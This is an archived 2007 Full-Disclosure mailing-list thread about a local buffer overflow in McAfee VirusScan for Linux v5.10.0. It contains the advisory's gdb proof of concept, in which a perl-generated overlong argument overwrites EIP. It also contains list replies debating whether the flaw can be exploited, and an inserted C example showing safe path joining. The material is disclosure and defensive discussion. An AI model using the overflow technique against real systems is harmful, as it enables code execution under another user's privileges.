Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Dear Joey Mengele,

Of course, it's a mitigating factor. But: default PATH_MAX under Linux is 4096, and it's not hard to create a file/folder with a longer path; it's impossible to access it. E.g. a folder with a path longer than PATH_MAX:

bash$ pwd
pwd: could not get current directory: getcwd: cannot access parent directories: Result too large
bash$ ls
job-working-directory: could not get current directory: getcwd: cannot access parent directories: Result too large

Access is not required in this case. It's possible to create _searchable_ files with a length up to approximately MAX_PATH + NAME_MAX. It's more than required to exploit (4128).

--Wednesday, August 15, 2007, 9:34:50 PM, you wrote to [EMAIL PROTECTED]:

JM> You are playing handpuppet of the jackass, actually. Check PATH_MAX
JM> in the Linux Kernel.
JM>
JM> J
JM>
JM> On Wed, 15 Aug 2007 12:53:18 -0400 monikerd [EMAIL PROTECTED] wrote:
JM>> Joey Mengele wrote:
JM>>> Where does security come into play here? This is a local crash in a non-setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?
JM>>>
JM>>> J
JM>>
JM>> I'll play advocate of the devil then. Imagine a wiki running on a webserver that allows anybody to create new topics, which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to thwart most usual attacks. If you could create an arbitrarily long topic, then you *might* be able to execute some code when some cronjob would scan the drive and come across the file? Creating files is a different privilege than running code. Hence imho it's not a bogus advisory.
JM>>
JM>> Another possibility would be to create an archive that extracts an incredibly long filename, perhaps? Scanning an archive before/after it's extracted is a pretty common event, I guess.

-- 
~/ZARAZA http://securityvulns.com/
...he never took up programming without a cudgel. (Lem)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
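An added example (not code from this thread, the advisory, or McAfee) of the point ZARAZA makes above: a scanner that joins a directory path and an entry name into a char[PATH_MAX] buffer with strcpy/strcat overflows once the directory itself was reached level by level, so a PATH_MAX check on the command line is not a mitigation; the hardened variants below either refuse the join or size the buffer from the inputs. Function names are hypothetical, and PATH_MAX/NAME_MAX assume the Linux values (4096/255).

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif
#define ENTRY_NAME_MAX 255   /* NAME_MAX on common Linux filesystems */

/* The defect pattern (a constructed illustration, not uvscan's code) is a
 * walker doing strcpy(buf, dir); strcat(buf, "/"); strcat(buf, name) into
 * char buf[PATH_MAX]: dir can already be ~PATH_MAX bytes when the walker
 * reached it level by level, and name adds up to NAME_MAX more. */

/* Hardened: snprintf() reports the length it wanted; anything that does not
 * fit is an error, not a silent truncation. Returns -1 and ENAMETOOLONG. */
static int join_path_checked(char *out, size_t outsz, const char *dir, const char *name)
{
    int n = snprintf(out, outsz, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz) out[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    return n;
}

/* Alternative: size the buffer from the inputs instead of assuming PATH_MAX. */
static char *join_path_alloc(const char *dir, const char *name)
{
    size_t dl = strlen(dir), nl = strlen(name);
    char *p = malloc(dl + 1 + nl + 1);
    if (p) { memcpy(p, dir, dl); p[dl] = '/'; memcpy(p + dl + 1, name, nl + 1); }
    return p;
}

/* Worst case from the thread: a directory path just under PATH_MAX plus a
 * NAME_MAX entry name. Returns the joined length when the fixed-buffer
 * variant rejects it and the allocating variant builds it, else 0. */
static size_t demo_longest_searchable_path(void)
{
    char dir[PATH_MAX], name[ENTRY_NAME_MAX + 1], fixed[PATH_MAX];
    memset(dir, 'a', PATH_MAX - 1);     dir[PATH_MAX - 1] = '\0';
    memset(name, 'b', ENTRY_NAME_MAX);  name[ENTRY_NAME_MAX] = '\0';
    int rc = join_path_checked(fixed, sizeof fixed, dir, name);
    int saved = errno;
    char *p = join_path_alloc(dir, name);
    size_t len = p ? strlen(p) : 0;
    free(p);
    return (rc == -1 && saved == ENAMETOOLONG && len > PATH_MAX) ? len : 0;
}

int main(void) { printf("longest searchable path: %zu bytes\n", demo_longest_searchable_path()); return 0; }
```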
[Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
I - TITLE

Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

II - SUMMARY

Description: Local buffer overflow vulnerability in McAfee Virus Scan for Linux and Unix allows arbitrary code execution
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
Date: August 15th, 2007
Severity: Low-Medium
References: http://www.devtarget.org/mcafee-advisory-08-2007.txt

III - OVERVIEW

McAfee Virus Scan for Linux and Unix is a command-line version of the popular McAfee anti-virus scanner running on the Linux operating system as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was discovered that the product is prone to a classic buffer overflow vulnerability when attempting to scan files or directories with a particularly long name. This vulnerability results in the local execution of arbitrary code with the privileges of the user running the scanner; privilege escalation is by default not possible. Remote exploitation appears to be infeasible due to file length limitations in popular file systems.

IV - DETAILS

The overflow occurs when the product tries to scan a file or directory with a name that is longer than a certain size (approx. 4124+ bytes). For example, on a Debian Linux 3.1 test system it takes 4124+4 bytes to successfully overwrite the EIP register and thus execute arbitrary code:

# /usr/local/uvscan/uvscan --version
Virus Scan for Linux v5.10.0
Copyright (c) 1992-2006 McAfee, Inc. All rights reserved.
(408) 988-3832
EVALUATION COPY - May 26 2006
Scan engine v5.1.00 for Linux.
Virus data file v4777 created Jun 05 2006
Scanning for 194376 viruses, trojans and variants.

# gdb /usr/local/uvscan/uvscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...(no debugging symbols found)
Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x4124 . "B"x4'`
Starting program: /usr/local/uvscan/uvscan `perl -e 'print "A"x4124 . "B"x4'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 1080238208 (LWP 2461)]
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1080238208 (LWP 2461)]
0x42424242 in ?? ()
(gdb) info registers
eax            0x1              1
ecx            0x8068430        134644784
edx            0x1              1
ebx            0x41414141       1094795585
esp            0xbfffdc40       0xbfffdc40
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x42424242       0x42424242
eflags         0x282            642
cs             0x73             115
ss             0x7b             123
ds             0x7b             123
es             0x7b             123
fs             0x0              0
gs             0x33             51

V - EXPLOIT CODE

An exploit for this vulnerability has been developed but will not be released to the general public at this time.

VI - WORKAROUND/FIX

To address this problem, the vendor has released McAfee VirusScan Command Line Scanner for Linux and Unix version 5.20. Thus all users of the product are asked to test and install this patch as soon as possible. McAfee has also published a dedicated security bulletin that covers the problem (see https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613576).

VII - DISCLOSURE TIMELINE

18. December 2006 - Notified [EMAIL PROTECTED]
19. December 2006 - Vendor responded that vulnerability is being investigated
19. December to 15. August 2007 - Weekly vendor report on the progress of the development of the patch
01. August 2007 - Release of patch
15. August 2007 - Public disclosure
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Where does security come into play here? This is a local crash in a non-setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?

J

P.S. We all know this advisory is bullshit, you should have sold it to WabiSabiLabi LOLOLOL

On Wed, 15 Aug 2007 08:56:54 -0400 Sebastian Wolfgarten [EMAIL PROTECTED] wrote:
> I - TITLE
> Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
> V - EXPLOIT CODE
> An exploit for this vulnerability has been developed but will not be released to the general public at this time.

Don't ever release that to the general public. Why would we like to run rm -rf / in such a funny way? I can type the command in the shell if all I want to do is attack myself. ;-)
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Joey Mengele wrote:
> Where does security come into play here? This is a local crash in a non-setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?
>
> J

I'll play advocate of the devil then. Imagine a wiki running on a webserver that allows anybody to create new topics, which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to thwart most usual attacks. If you could create an arbitrarily long topic, then you *might* be able to execute some code when some cronjob would scan the drive and come across the file? Creating files is a different privilege than running code. Hence imho it's not a bogus advisory.

Another possibility would be to create an archive that extracts an incredibly long filename, perhaps? Scanning an archive before/after it's extracted is a pretty common event, I guess.
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Imagine this... One Linux system maintained by an admin. I do not have root access but I can create and edit files. Admin runs virus scan. I create an exploit file. It exploits virus scan. I get the privileges of the user running the virus scan.

--- Harry Muchow [EMAIL PROTECTED] wrote:
>> V - EXPLOIT CODE
>> An exploit for this vulnerability has been developed but will not be released to the general public at this time.
>
> Don't ever release that to the general public. Why would we like to run rm -rf / in such a funny way? I can type the command in the shell if all I want to do is attack myself. ;-)
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
But Joey, as I said before, maybe somebody assigned SUID root privileges to the scanner to enable ordinary users to run the scanner? I know this is not the case by default, but it might happen (and will result in a local privilege escalation). For instance, in a similar buffer overflow that I discovered earlier this year in Trend Micro's virus scanner this was the exact problem...

Best regards,
Sebastian

> You are playing handpuppet of the jackass, actually. Check PATH_MAX in the Linux Kernel.
>
> J
>
> On Wed, 15 Aug 2007 12:53:18 -0400 monikerd [EMAIL PROTECTED] wrote:
>> Joey Mengele wrote:
>>> Where does security come into play here? This is a local crash in a non-setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?
>>>
>>> J
>>
>> I'll play advocate of the devil then. Imagine a wiki running on a webserver that allows anybody to create new topics, which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to thwart most usual attacks. If you could create an arbitrarily long topic, then you *might* be able to execute some code when some cronjob would scan the drive and come across the file? Creating files is a different privilege than running code. Hence imho it's not a bogus advisory.
>>
>> Another possibility would be to create an archive that extracts an incredibly long filename, perhaps? Scanning an archive before/after it's extracted is a pretty common event, I guess.
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
You are playing handpuppet of the jackass, actually. Check PATH_MAX in the Linux Kernel.

J

On Wed, 15 Aug 2007 12:53:18 -0400 monikerd [EMAIL PROTECTED] wrote:
> Joey Mengele wrote:
>> Where does security come into play here? This is a local crash in a non-setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?
>>
>> J
>
> I'll play advocate of the devil then. Imagine a wiki running on a webserver that allows anybody to create new topics, which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to thwart most usual attacks. If you could create an arbitrarily long topic, then you *might* be able to execute some code when some cronjob would scan the drive and come across the file? Creating files is a different privilege than running code. Hence imho it's not a bogus advisory.
>
> Another possibility would be to create an archive that extracts an incredibly long filename, perhaps? Scanning an archive before/after it's extracted is a pretty common event, I guess.
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Security comes into play here because a user can create a malicious play that would overflow the virus scan. Consequently the user can execute code with the privileges of the user running virus scan. Thus, it is a local privilege escalation scenario.

> Date: Wed, 15 Aug 2007 18:53:18 +0200
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> CC: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
>
> Joey Mengele wrote:
>> Where does security come into play here? This is a local crash in a non-setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?
>>
>> J